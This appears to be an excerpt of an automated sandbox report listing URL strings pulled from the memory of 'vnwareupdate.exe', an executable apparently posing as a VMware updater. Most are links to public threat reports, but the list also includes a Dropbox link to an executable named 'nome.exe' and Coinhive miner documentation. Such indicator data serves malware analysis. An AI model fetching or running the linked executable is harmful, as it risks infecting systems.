Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp	String found in binary or memory: https://cert.gov.il/Updates/Alerts/SiteAssets/CERT-IL-ALERT-W-120.pdf
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://cert.gov.il/Updates/Alerts/SiteAssets/CERT-IL-ALERT-W-120.pdfLegspin
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://cert.gov.il/Updates/Alerts/SiteAssets/CERT-IL-ALERT-W-120.pdfOilRig
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf.dAnalysis
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf20Analysis
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdfAnalysis
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdfMaAnalysis
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdfThe
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdfampAnalysis
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdfare
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdfgiAnalysis
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdfhtAnalysis
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdfmlAnalysis
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdfo-Analysis
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdfpeAnalysis
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdfpoAnalysis
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdfprAnalysis
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdfs.Analysis
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdftaAnalysis
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdfumAnalysis
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.ca/2017/12/champing-cyberbit-ethiopian-dissidents-targeted-co
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.ca/2017/12/champing-cyberbit-ethiopian-dissidents-targeted-coEthiopian
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.ca/2017/12/champing-cyberbit-ethiopian-dissidents-targeted-coThe
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.ca/2017/12/champing-cyberbit-ethiopian-dissidents-targeted-cobEthiopian
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.ca/2018/01/spying-on-a-budget-inside-a-phishing-operation-wit
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.ca/2018/01/spying-on-a-budget-inside-a-phishing-operation-wit2Inside
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.ca/2018/01/spying-on-a-budget-inside-a-phishing-operation-witInside
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.ca/2018/01/spying-on-a-budget-inside-a-phishing-operation-witSamSam
Source: vnwareupdate.exe, 00000003.00000003.242214739.0000000005451000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2012/07/from-bahrain-with-love-finfishers-spy-kit-exposed
Source: vnwareupdate.exe, 00000003.00000002.552214471.0000000003DA1000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2012/07/from-bahrain-with-love-finfishers-spy-kit-exposedCNCERT
Source: vnwareupdate.exe, 00000003.00000002.552214471.0000000003DA1000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2012/07/from-bahrain-with-love-finfishers-spy-kit-exposedFrom
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2012/07/from-bahrain-with-love-finfishers-spy-kit-exposedMalware
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2012/07/from-bahrain-with-love-finfishers-spy-kit-exposedPayloads
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2012/07/from-bahrain-with-love-finfishers-spy-kit-exposedPossible
Source: vnwareupdate.exe, 00000003.00000002.516989975.00000000021F1000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2012/07/from-bahrain-with-love-finfishers-spy-kit-exposede
Source: vnwareupdate.exe, 00000003.00000003.236671866.0000000005A91000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2012/07/recent-observations/
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2012/07/recent-observations/Exploring
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2012/07/recent-observations/Inside
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2012/07/recent-observations/Recent
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2012/07/recent-observations/Wiper
Source: vnwareupdate.exe, 00000003.00000003.245318104.0000000003B27000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2013/03/you-only-click-twice-finfishers-global-proliferat
Source: vnwareupdate.exe, 00000003.00000003.242072217.0000000005511000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2013/08/surtr-malware-family-targeting-the-tibetan-commun
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2013/08/surtr-malware-family-targeting-the-tibetan-communKnock
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2013/08/surtr-malware-family-targeting-the-tibetan-communMicrosoft
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2013/08/surtr-malware-family-targeting-the-tibetan-communSurtr:
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2013/08/surtr-malware-family-targeting-the-tibetan-communaCryptoLuck
Source: vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2014/12/malware-attack-targeting-syrian-isis-critics/Iranian
Source: vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2014/12/malware-attack-targeting-syrian-isis-critics/Malware
Source: vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2015/03/tibetan-uprising-day-malware-attacks/
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2015/03/tibetan-uprising-day-malware-attacks/Communities
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2015/03/tibetan-uprising-day-malware-attacks/Tibetan
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2015/06/targeted-attacks-against-tibetan-and-hong-kong-gr
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2015/06/targeted-attacks-against-tibetan-and-hong-kong-grSpoofed
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2015/06/targeted-attacks-against-tibetan-and-hong-kong-grTargeted
Source: vnwareupdate.exe, 00000003.00000003.232809431.0000000005F73000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2015/08/what-we-know-about-the-south-korea-niss-use-of-ha
Source: vnwareupdate.exe, 00000003.00000002.565250671.0000000003FA1000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2015/08/what-we-know-about-the-south-korea-niss-use-of-haPackrat:
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2015/10/targeted-attacks-ngo-burma/Quaverse
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2016/08/group5-syria/
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2016/08/group5-syria/APT29
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2016/08/group5-syria/Angler
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2016/08/group5-syria/Group5:
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2016/08/group5-syria/Lazarus
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://citizenlab.org/2016/08/group5-syria/Miniduke
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://code.google.com/p/google-security-research/issues/detail?id=473&can=1&start=200
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://coinhive.com/documentation/miner
Source: vnwareupdate.exe, 00000003.00000003.242072217.0000000005511000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://community.rapid7.com/community/infosec/blog/2013/06/07/keyboy-targeted-a
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://community.rapid7.com/community/infosec/blog/2013/06/07/keyboy-targeted-aKeyBoy
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://community.rapid7.com/community/infosec/blog/2013/06/07/keyboy-targeted-aeKeyBoy
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://community.rapid7.com/community/infosec/blog/2013/06/07/keyboy-targeted-attack
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp	String found in binary or memory: https://community.rapid7.com/community/infosec/blog/2013/08/19/byebye-and-the-ta
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: https://community.rapid7.com/community/infosec/blog/2013/08/19/byebye-and-the-taOperation
Source: vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: https://community.rsa.com/community/products/netwitness/blog/2017/07/10/active-m8
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://community.rsa.com/community/products/netwitness/blog/2017/08/04/targeted/hRemcos
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://community.rsa.com/community/products/netwitness/blog/2017/08/04/targetedBCHTHONIC
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://community.rsa.com/community/products/netwitness/blog/2017/08/04/targetedlesCHTHONIC
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: https://community.rsa.com/community/products/netwitness/blog/2017/08/18/russian-
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://community.rsa.com/community/products/netwitness/blog/2017/08/18/russian-Did
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: https://community.rsa.com/community/products/netwitness/blog/2017/08/18/russian-Russian
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: https://community.rsa.com/community/products/netwitness/blog/2017/08/18/russian-Tale
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: https://community.rsa.com/community/products/netwitness/blog/2017/08/18/russian-uRussian
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: https://community.rsa.com/community/products/netwitness/blog/2017/12/08/grateful
Source: vnwareupdate.exe, 00000003.00000002.522931627.000000000237B000.00000004.00000001.sdmp	String found in binary or memory: https://creativecommons.org/licenses/by-nc/4.0/
Source: vnwareupdate.exe, 00000003.00000002.522931627.000000000237B000.00000004.00000001.sdmp	String found in binary or memory: https://creativecommons.org/licenses/by-nc/4.0/.
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: https://cyberkov.com/wp-content/uploads/2016/09/Hunting-Libyan-Scorpions-EN.pdf
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://cysinfo.com/azorult-version-2-atrocious-spyware-in8
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://cysinfo.com/azorult-version-2-atrocious-spyware-infection-using-3-1-rtf-AzorUlt
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://cysinfo.com/azorult-version-2-atrocious-spyware-infection-using-3-1-rtf-Double
Source: vnwareupdate.exe, 00000003.00000002.528528109.00000000028B2000.00000004.00000001.sdmp	String found in binary or memory: https://cysinfo.com/cyber-attack-targeting-cbi-and-possibly-indian-army-official
Source: vnwareupdate.exe, 00000003.00000003.234392495.00000000060B3000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.528528109.00000000028B2000.00000004.00000001.sdmp	String found in binary or memory: https://cysinfo.com/cyber-attack-targeting-cbi-and-possibly-indian-army-officialCyber
Source: vnwareupdate.exe, 00000003.00000003.234392495.00000000060B3000.00000004.00000001.sdmp	String found in binary or memory: https://cysinfo.com/cyber-attack-targeting-cbi-and-possibly-indian-army-officialLazarus
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://cysinfo.com/cyber-attack-targeting-cbi-and-possibly-indian-army-officialR
Source: vnwareupdate.exe, 00000003.00000003.241919530.0000000005791000.00000004.00000001.sdmp	String found in binary or memory: https://cysinfo.com/malware-actors-using-nic-cyber-security-themed-spear-phishin
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://cysinfo.com/malware-actors-using-nic-cyber-security-themed-spear-phishinn
Source: vnwareupdate.exe, 00000003.00000002.522468680.00000000022F1000.00000004.00000001.sdmp	String found in binary or memory: https://cysinfo.com/uri-terror-at
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.233075798.00000000060F3000.00000004.00000001.sdmp	String found in binary or memory: https://cysinfo.com/uri-terror-attack-spear-phishing-emails-targeting-indian-emb
Source: vnwareupdate.exe, 00000003.00000003.233075798.00000000060F3000.00000004.00000001.sdmp	String found in binary or memory: https://cysinfo.com/uri-terror-attack-spear-phishing-emails-targeting-indian-embURI
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://digitasecurity.com/blog/2018/02/19/coldroot/
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://digitasecurity.com/blog/2018/02/19/coldroot/Denis
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://dl.dropbox.com/u/105015858
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://dl.dropbox.com/u/105015858/nome.exe
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: https://docs.googl
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErcContinued
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErcNew
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErcs
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RX
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RX01Campaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RX03Campaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RX08Campaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RX31Campaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RX32Campaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RX33Campaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RX37Campaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RX5cCampaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RX5dCampaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RX66Campaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RX78Campaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RX7dCampaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RX80
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RX84Campaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RX8dCampaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RX93Campaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RX95Campaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RX97Campaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RXCampaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RXNewly
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RXPTCampaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RXa7Campaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RXaeCampaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RXalCampaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RXasCampaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RXb6Campaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RXc7Campaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RXc8Campaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RXcdCampaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RXctCampaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RXd8Campaign
